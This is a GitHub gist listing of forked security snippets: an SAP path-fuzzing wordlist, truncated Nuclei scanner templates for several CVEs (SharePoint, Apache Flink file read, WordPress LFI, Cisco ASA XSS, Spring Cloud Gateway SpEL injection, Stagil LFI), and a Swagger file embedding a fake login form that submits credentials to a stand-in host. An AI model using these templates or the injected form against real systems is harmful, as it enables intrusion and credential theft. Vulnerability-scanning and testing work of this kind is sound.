Skip to content

Instantly share code, notes, and snippets.

View emadshanab's full-sized avatar
🏠
Working from home

Emad Shanab emadshanab

🏠
Working from home
View GitHub Profile
@emadshanab
emadshanab / SAPwordlists.txt
Created December 12, 2023 02:14 — forked from 0x240x23elu/SAPwordlists.txt
SAP Wordlist - SAP fuzz
/admin/admin.js
/admin/appinfo.jsp
/admin/cache_stats.jsp
/admin/catalogcache.jsp
/admin/ccms/customizing.jsp
/admin/ccms/result.jsp
/admin/ccms/sendFailure.jsp
/ecall/jsp/customer/login/login.jsp
/ecall/jsp/customer/upload/upload.jsp
/user/admin/index.jsp
@emadshanab
emadshanab / CVE-2020-0646
Created December 12, 2023 02:13 — forked from 0x240x23elu/CVE-2020-0646
CVE-2020-0646
info:
name: CVE-2020-0646
author: 0x240x23elu
severity: High
requests:
- raw:
- |
POST /EN/_vti_bin/WebPartPages.asmx HTTP/1.1
Host: {{Hostname}}
@emadshanab
emadshanab / CVE-2020-17519
Created December 12, 2023 02:13 — forked from 0x240x23elu/CVE-2020-17519
CVE-2020-17519
id: CVE-2020-17519
info:
name: Apache Flink Arbitrary file reading with JobManager
author: 0x240x23elu & 0rich1 of Ant Security FG Lab
severity: High
requests:
- method: GET
path:
@emadshanab
emadshanab / wordpress-LFI.yaml
Created December 12, 2023 02:13 — forked from 0x240x23elu/wordpress-LFI.yaml
wordpress-LFI
id: wordpress-LFI
info:
name: wordpress-LFI
author: 0x240x23elu
severity: High
requests:
- method: GET
path:
@emadshanab
emadshanab / CVE_RCE2-1.yaml
Created December 12, 2023 02:13 — forked from 0x240x23elu/CVE_RCE2-1.yaml
CVE_RCE2-1
id: CVE_RCE2-1
info:
name: CVE_RCE2
author: 0x240x23elu
severity: high
requests:
- payloads:
dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt
@emadshanab
emadshanab / CVE-2020-3580.yaml
Created December 12, 2023 02:12 — forked from 0x240x23elu/CVE-2020-3580.yaml
CVE-2020-3580
id: CVE-2020-3580
info:
name: xss in cisco ASA
author: 0x240x23elu
severity: high
description: xss in cisco ASA
tags: cve,cve2020,cisco
requests:
@emadshanab
emadshanab / spring-cloud.yaml
Created December 12, 2023 02:12 — forked from 0x240x23elu/spring-cloud.yaml
spring-cloud
id: spring-cloud
info:
name: spring-cloud Exposure
author: 0x240x23elu
severity: info
tags: panel,spring-cloud
requests:
- method: GET
id: CVE-2022-22947
info:
name: CVE-2022-22947
author: 0x240x23elu
severity: critical
description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
reference:
- https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
tags: cve,cve2022,rce,spring
id: CVE-2023-26255
info:
name: Stagil navigation for jira - Local File Inclusion
author: 0x240x23elu
severity: high
description: Prior to version 2.0.52 of the “Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
swagger: '2.0'
info:
version: 1.0.0
title: Fake Login Page
description: '<div class="login-form">
<div class="heading">
<h1>HTML Injection : Fake Login</h1>
</div>
<div class="form-container">
<form action="https://example.com/login" method="post" class="form-signin">